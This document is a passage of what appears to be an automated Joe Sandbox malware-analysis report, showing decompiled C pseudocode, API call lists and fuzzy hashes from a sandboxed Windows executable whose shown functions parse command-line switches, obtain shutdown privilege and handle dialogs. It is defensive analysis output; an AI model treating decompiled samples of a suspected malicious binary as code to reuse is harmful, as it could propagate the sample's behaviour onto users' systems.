                                                                                                                                                                                                      																_t218 = 0xa68b3e;
                                                                                                                                                                                                      																_t105 = _v276;
                                                                                                                                                                                                      																if(_t104 != 0x54) {
                                                                                                                                                                                                      																	_t218 = 0xa68a3a;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      																E00A61680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                      																_t202 = 0x104;
                                                                                                                                                                                                      																E00A6658A(_t218, 0x104, 0xa61140);
                                                                                                                                                                                                      																if(E00A631E0(_t218) != 0) {
                                                                                                                                                                                                      																	goto L50;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	goto L106;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t111 = _t100 - 0xa;
                                                                                                                                                                                                      													if(_t111 == 0) {
                                                                                                                                                                                                      														if(_v266 != 0) {
                                                                                                                                                                                                      															if(_v266 != 0x3a) {
                                                                                                                                                                                                      																goto L49;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																_t199 = _v265;
                                                                                                                                                                                                      																if(_t199 != 0) {
                                                                                                                                                                                                      																	_t219 =  &_v265;
                                                                                                                                                                                                      																	do {
                                                                                                                                                                                                      																		_t219 = _t219 + 1;
                                                                                                                                                                                                      																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                      																		if(_t115 == 0) {
                                                                                                                                                                                                      																			 *0xa68a2c = 1;
                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                      																			_t200 = 2;
                                                                                                                                                                                                      																			_t119 = _t115 - _t200;
                                                                                                                                                                                                      																			if(_t119 == 0) {
                                                                                                                                                                                                      																				 *0xa68a30 = 1;
                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                      																				if(_t119 == 0xf) {
                                                                                                                                                                                                      																					 *0xa68a34 = 1;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t209 = 0;
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																			}
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																		_t118 =  *_t219;
                                                                                                                                                                                                      																		_t199 = _t118;
                                                                                                                                                                                                      																	} while (_t118 != 0);
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															 *0xa68a2c = 1;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														goto L50;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t127 = _t111 - 3;
                                                                                                                                                                                                      														if(_t127 == 0) {
                                                                                                                                                                                                      															if(_v266 != 0) {
                                                                                                                                                                                                      																if(_v266 != 0x3a) {
                                                                                                                                                                                                      																	goto L49;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                      																	if(_t129 == 0x31) {
                                                                                                                                                                                                      																		goto L76;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		if(_t129 == 0x41) {
                                                                                                                                                                                                      																			goto L83;
                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                      																			if(_t129 == 0x55) {
                                                                                                                                                                                                      																				goto L76;
                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                      																				goto L49;
                                                                                                                                                                                                      																			}
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																L76:
                                                                                                                                                                                                      																_push(2);
                                                                                                                                                                                                      																_pop(1);
                                                                                                                                                                                                      																L83:
                                                                                                                                                                                                      																 *0xa68a38 = 1;
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      															goto L50;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t132 = _t127 - 1;
                                                                                                                                                                                                      															if(_t132 == 0) {
                                                                                                                                                                                                      																if(_v266 != 0) {
                                                                                                                                                                                                      																	if(_v266 != 0x3a) {
                                                                                                                                                                                                      																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                      																			goto L49;
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		_t201 = _v265;
                                                                                                                                                                                                      																		 *0xa69a2c = 1;
                                                                                                                                                                                                      																		if(_t201 != 0) {
                                                                                                                                                                                                      																			_t220 =  &_v265;
                                                                                                                                                                                                      																			do {
                                                                                                                                                                                                      																				_t220 = _t220 + 1;
                                                                                                                                                                                                      																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                      																				if(_t142 == 0) {
                                                                                                                                                                                                      																					_t143 = 2;
                                                                                                                                                                                                      																					 *0xa69a2c =  *0xa69a2c | _t143;
                                                                                                                                                                                                      																					goto L70;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t145 = _t142 - 3;
                                                                                                                                                                                                      																					if(_t145 == 0) {
                                                                                                                                                                                                      																						 *0xa68d48 =  *0xa68d48 | 0x00000040;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						_t146 = _t145 - 5;
                                                                                                                                                                                                      																						if(_t146 == 0) {
                                                                                                                                                                                                      																							 *0xa69a2c =  *0xa69a2c & 0xfffffffd;
                                                                                                                                                                                                      																							goto L70;
                                                                                                                                                                                                      																						} else {
                                                                                                                                                                                                      																							_t147 = _t146 - 5;
                                                                                                                                                                                                      																							if(_t147 == 0) {
                                                                                                                                                                                                      																								 *0xa69a2c =  *0xa69a2c & 0xfffffffe;
                                                                                                                                                                                                      																								goto L70;
                                                                                                                                                                                                      																							} else {
                                                                                                                                                                                                      																								_t149 = _t147;
                                                                                                                                                                                                      																								if(_t149 == 0) {
                                                                                                                                                                                                      																									 *0xa68d48 =  *0xa68d48 | 0x00000080;
                                                                                                                                                                                                      																								} else {
                                                                                                                                                                                                      																									if(_t149 == 3) {
                                                                                                                                                                                                      																										 *0xa69a2c =  *0xa69a2c | 0x00000004;
                                                                                                                                                                                                      																										L70:
                                                                                                                                                                                                      																										 *0xa68a28 = 1;
                                                                                                                                                                                                      																									} else {
                                                                                                                                                                                                      																										_t209 = 0;
                                                                                                                                                                                                      																									}
                                                                                                                                                                                                      																								}
                                                                                                                                                                                                      																							}
                                                                                                                                                                                                      																						}
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																				_t144 =  *_t220;
                                                                                                                                                                                                      																				_t201 = _t144;
                                                                                                                                                                                                      																			} while (_t144 != 0);
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	 *0xa69a2c = 3;
                                                                                                                                                                                                      																	 *0xa68a28 = 1;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      																goto L50;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																if(_t132 == 0) {
                                                                                                                                                                                                      																	goto L98;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	L49:
                                                                                                                                                                                                      																	_t209 = 0;
                                                                                                                                                                                                      																	L50:
                                                                                                                                                                                                      																	_t173 = _v272;
                                                                                                                                                                                                      																	if( *_t173 != 0) {
                                                                                                                                                                                                      																		goto L2;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		break;
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L106;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										L34:
                                                                                                                                                                                                      										_t209 = 0;
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L131;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if( *0xa68a2c != 0 &&  *0xa68b3e == 0) {
                                                                                                                                                                                                      						if(GetModuleFileNameA( *0xa69a3c, 0xa68b3e, 0x104) == 0) {
                                                                                                                                                                                                      							_t209 = 0;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t202 = 0x5c;
                                                                                                                                                                                                      							 *((char*)(E00A666C8(0xa68b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t63 = _t209;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L131:
                                                                                                                                                                                                      			}

                                                                                                                                                                                                      0x00a65e24
                                                                                                                                                                                                      0x00a65e24
                                                                                                                                                                                                      0x00a65e2c
                                                                                                                                                                                                      0x00a65e47
                                                                                                                                                                                                      0x00a65e4a
                                                                                                                                                                                                      0x00a661d2
                                                                                                                                                                                                      0x00a661e2
                                                                                                                                                                                                      0x00a661e7
                                                                                                                                                                                                      0x00a661ee
                                                                                                                                                                                                      0x00a661f1
                                                                                                                                                                                                      0x00a661f1
                                                                                                                                                                                                      0x00a661f8
                                                                                                                                                                                                      0x00a661f8
                                                                                                                                                                                                      0x00a65e50
                                                                                                                                                                                                      0x00a65e53
                                                                                                                                                                                                      0x00a66109
                                                                                                                                                                                                      0x00a6611f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a66125
                                                                                                                                                                                                      0x00a66137
                                                                                                                                                                                                      0x00a6613a
                                                                                                                                                                                                      0x00a6613c
                                                                                                                                                                                                      0x00a6613e
                                                                                                                                                                                                      0x00a6613e
                                                                                                                                                                                                      0x00a66141
                                                                                                                                                                                                      0x00a66141
                                                                                                                                                                                                      0x00a66143
                                                                                                                                                                                                      0x00a66144
                                                                                                                                                                                                      0x00a6614a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a66150
                                                                                                                                                                                                      0x00a66152
                                                                                                                                                                                                      0x00a6615c
                                                                                                                                                                                                      0x00a66170
                                                                                                                                                                                                      0x00a66172
                                                                                                                                                                                                      0x00a6617c
                                                                                                                                                                                                      0x00a66190
                                                                                                                                                                                                      0x00a66190
                                                                                                                                                                                                      0x00a66196
                                                                                                                                                                                                      0x00a661a5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a661ab
                                                                                                                                                                                                      0x00a661b9
                                                                                                                                                                                                      0x00a661c6
                                                                                                                                                                                                      0x00a661c6
                                                                                                                                                                                                      0x00a6617e
                                                                                                                                                                                                      0x00a66180
                                                                                                                                                                                                      0x00a6618a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6618a
                                                                                                                                                                                                      0x00a6615e
                                                                                                                                                                                                      0x00a66160
                                                                                                                                                                                                      0x00a6616a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6616a
                                                                                                                                                                                                      0x00a6615c
                                                                                                                                                                                                      0x00a6614a
                                                                                                                                                                                                      0x00a6610b
                                                                                                                                                                                                      0x00a6610e
                                                                                                                                                                                                      0x00a6610e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65e59
                                                                                                                                                                                                      0x00a65e59
                                                                                                                                                                                                      0x00a65e5c
                                                                                                                                                                                                      0x00a6604f
                                                                                                                                                                                                      0x00a66056
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6605c
                                                                                                                                                                                                      0x00a6606e
                                                                                                                                                                                                      0x00a66071
                                                                                                                                                                                                      0x00a66073
                                                                                                                                                                                                      0x00a66075
                                                                                                                                                                                                      0x00a66075
                                                                                                                                                                                                      0x00a66078
                                                                                                                                                                                                      0x00a66078
                                                                                                                                                                                                      0x00a6607a
                                                                                                                                                                                                      0x00a6607b
                                                                                                                                                                                                      0x00a66081
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a66087
                                                                                                                                                                                                      0x00a66087
                                                                                                                                                                                                      0x00a6608d
                                                                                                                                                                                                      0x00a6609c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a660a2
                                                                                                                                                                                                      0x00a660aa
                                                                                                                                                                                                      0x00a660b2
                                                                                                                                                                                                      0x00a660b7
                                                                                                                                                                                                      0x00a660bd
                                                                                                                                                                                                      0x00a660bf
                                                                                                                                                                                                      0x00a660bf
                                                                                                                                                                                                      0x00a660d6
                                                                                                                                                                                                      0x00a660e0
                                                                                                                                                                                                      0x00a660e7
                                                                                                                                                                                                      0x00a660f5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a660f5
                                                                                                                                                                                                      0x00a6609c
                                                                                                                                                                                                      0x00a66081
                                                                                                                                                                                                      0x00a65e62
                                                                                                                                                                                                      0x00a65e62
                                                                                                                                                                                                      0x00a65e65
                                                                                                                                                                                                      0x00a65fd3
                                                                                                                                                                                                      0x00a65fe9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65fef
                                                                                                                                                                                                      0x00a65fef
                                                                                                                                                                                                      0x00a65ff7
                                                                                                                                                                                                      0x00a65ffd
                                                                                                                                                                                                      0x00a66003
                                                                                                                                                                                                      0x00a66006
                                                                                                                                                                                                      0x00a66011
                                                                                                                                                                                                      0x00a66014
                                                                                                                                                                                                      0x00a6603d
                                                                                                                                                                                                      0x00a66016
                                                                                                                                                                                                      0x00a66018
                                                                                                                                                                                                      0x00a66019
                                                                                                                                                                                                      0x00a6601b
                                                                                                                                                                                                      0x00a66033
                                                                                                                                                                                                      0x00a6601d
                                                                                                                                                                                                      0x00a66020
                                                                                                                                                                                                      0x00a66029
                                                                                                                                                                                                      0x00a66022
                                                                                                                                                                                                      0x00a66022
                                                                                                                                                                                                      0x00a66022

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharNextA.USER32(?,00000000,?,?), ref: 00A65CEE
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00A68B3E,00000104,00000000,?,?), ref: 00A65DFC
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 00A65E3E
                                                                                                                                                                                                      • CharUpperA.USER32(-00000052), ref: 00A65EE1
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00A65F6F
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 00A65FA7
                                                                                                                                                                                                      • CharUpperA.USER32(-0000004E), ref: 00A66008
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 00A660AA
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00A61140,00000000,00000040,00000000), ref: 00A661F1
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00A661F8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                      • String ID: "$"$:$RegServer
                                                                                                                                                                                                      • API String ID: 1203814774-25366791
                                                                                                                                                                                                      • Opcode ID: 68bdde658855c25d2dfa1f51635fab7f98afa79b2a3a579bec5c7d8eedbd2677
                                                                                                                                                                                                      • Instruction ID: 315844093152daaaf6471512c24e759b94c72f161090cc3d4fa30df9c78d1b18
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68bdde658855c25d2dfa1f51635fab7f98afa79b2a3a579bec5c7d8eedbd2677
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1FD16F71E04A449FDF39CB788C487FA3BB5AB26344F1441AAD4C6D61D1DAB58E878F40
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 60%
                                                                                                                                                                                                      			E00A61F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				int _v12;
                                                                                                                                                                                                      				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                      				void* _v28;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                      				int _t28;
                                                                                                                                                                                                      				signed char _t30;
                                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                                      				void* _t40;
                                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t41 = __esi;
                                                                                                                                                                                                      				_t38 = __edi;
                                                                                                                                                                                                      				_t30 = __ecx;
                                                                                                                                                                                                      				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						if( *0xa69a40 != 0) {
                                                                                                                                                                                                      							_pop(_t30);
                                                                                                                                                                                                      							_t44 = _t46;
                                                                                                                                                                                                      							_t13 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                      							_push(_t38);
                                                                                                                                                                                                      							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                      								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                      								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                      								_v12 = 2;
                                                                                                                                                                                                      								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                      								CloseHandle(_v28);
                                                                                                                                                                                                      								_t41 = _t41;
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								if(_t21 != 0) {
                                                                                                                                                                                                      									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                      										_t25 = 1;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t37 = 0x4f7;
                                                                                                                                                                                                      										goto L3;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t37 = 0x4f6;
                                                                                                                                                                                                      									goto L4;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t37 = 0x4f5;
                                                                                                                                                                                                      								L3:
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								L4:
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								E00A644B9(0, _t37);
                                                                                                                                                                                                      								_t25 = 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_pop(_t40);
                                                                                                                                                                                                      							return E00A66CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t37 = 0x522;
                                                                                                                                                                                                      						_t28 = E00A644B9(0, 0x522, 0xa61140, 0, 0x40, 4);
                                                                                                                                                                                                      						if(_t28 != 6) {
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					__eax = E00A61EA7(__ecx);
                                                                                                                                                                                                      					if(__eax != 2) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						return _t28;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						goto L12;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}

















                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61fc3
                                                                                                                                                                                                      0x00a61f9a
                                                                                                                                                                                                      0x00a61f9a
                                                                                                                                                                                                      0x00a61fa2
                                                                                                                                                                                                      0x00a61fd9
                                                                                                                                                                                                      0x00a61fda
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61fa2

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00A61EFB
                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00A61F02
                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00A61FD3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                                                      • API String ID: 2795981589-3733053543
                                                                                                                                                                                                      • Opcode ID: 715f581ad6c62c954ae82bba036c18e55fc95d11ed0e5bb1688f9a38ab2b4397
                                                                                                                                                                                                      • Instruction ID: 2cc060faf95443c27553bad74614fcca7caaaba429aac1eaf33d1ece22503964
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 715f581ad6c62c954ae82bba036c18e55fc95d11ed0e5bb1688f9a38ab2b4397
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8221C971B40205BBDB209BE19C4AFBF7EBCEB95B10F14051EFA02E6181DB758802D661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A66CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                      
                                                                                                                                                                                                      				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                      				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                      			}



                                                                                                                                                                                                      0x00a66cf7
                                                                                                                                                                                                      0x00a66d00
                                                                                                                                                                                                      0x00a66d19

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A66E26,00A61000), ref: 00A66CF7
                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(00A66E26,?,00A66E26,00A61000), ref: 00A66D00
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,00A66E26,00A61000), ref: 00A66D0B
                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00A66E26,00A61000), ref: 00A66D12
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3231755760-0
                                                                                                                                                                                                      • Opcode ID: d80c6f61827b9aaca8064f658a3dca6b676a44a7f93b8d89882121e88e221bbc
                                                                                                                                                                                                      • Instruction ID: 039299948ffaebcb432ea30da2703526b8254f36ff79299b0745819218be9e38
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d80c6f61827b9aaca8064f658a3dca6b676a44a7f93b8d89882121e88e221bbc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86D0C932000108BBDB016BE1EC0CA593F38EB5A212F444100F319A2020CAB294528F52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                                                                      			E00A63210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				int _t20;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				int _t23;
                                                                                                                                                                                                      				char _t24;
                                                                                                                                                                                                      				long _t25;
                                                                                                                                                                                                      				int _t27;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                      				int _t33;
                                                                                                                                                                                                      				int _t34;
                                                                                                                                                                                                      				int _t37;
                                                                                                                                                                                                      				int _t38;
                                                                                                                                                                                                      				int _t39;
                                                                                                                                                                                                      				void* _t42;
                                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                                      				CHAR* _t49;
                                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				struct HWND__* _t64;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t64 = _a4;
                                                                                                                                                                                                      				_t6 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					L38:
                                                                                                                                                                                                      					EndDialog(_t64, ??);
                                                                                                                                                                                                      					L39:
                                                                                                                                                                                                      					__eflags = 1;
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t42 = 1;
                                                                                                                                                                                                      				_t10 = _t6 - 0x100;
                                                                                                                                                                                                      				if(_t10 == 0) {
                                                                                                                                                                                                      					E00A643D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                      					SetWindowTextA(_t64, "cent");
                                                                                                                                                                                                      					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                      					__eflags =  *0xa69a40 - _t42; // 0x3
                                                                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                                                                      						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L36:
                                                                                                                                                                                                      					return _t42;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t10 == _t42) {
                                                                                                                                                                                                      					_t20 = _a12 - 1;
                                                                                                                                                                                                      					__eflags = _t20;
                                                                                                                                                                                                      					if(_t20 == 0) {
                                                                                                                                                                                                      						_t21 = GetDlgItemTextA(_t64, 0x835, 0xa691e4, 0x104);
                                                                                                                                                                                                      						__eflags = _t21;
                                                                                                                                                                                                      						if(_t21 == 0) {
                                                                                                                                                                                                      							L32:
                                                                                                                                                                                                      							_t58 = 0x4bf;
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0x10);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							L25:
                                                                                                                                                                                                      							E00A644B9(_t64, _t58);
                                                                                                                                                                                                      							goto L39;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t49 = 0xa691e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t23 =  *_t49;
                                                                                                                                                                                                      							_t49 =  &(_t49[1]);
                                                                                                                                                                                                      							__eflags = _t23;
                                                                                                                                                                                                      						} while (_t23 != 0);
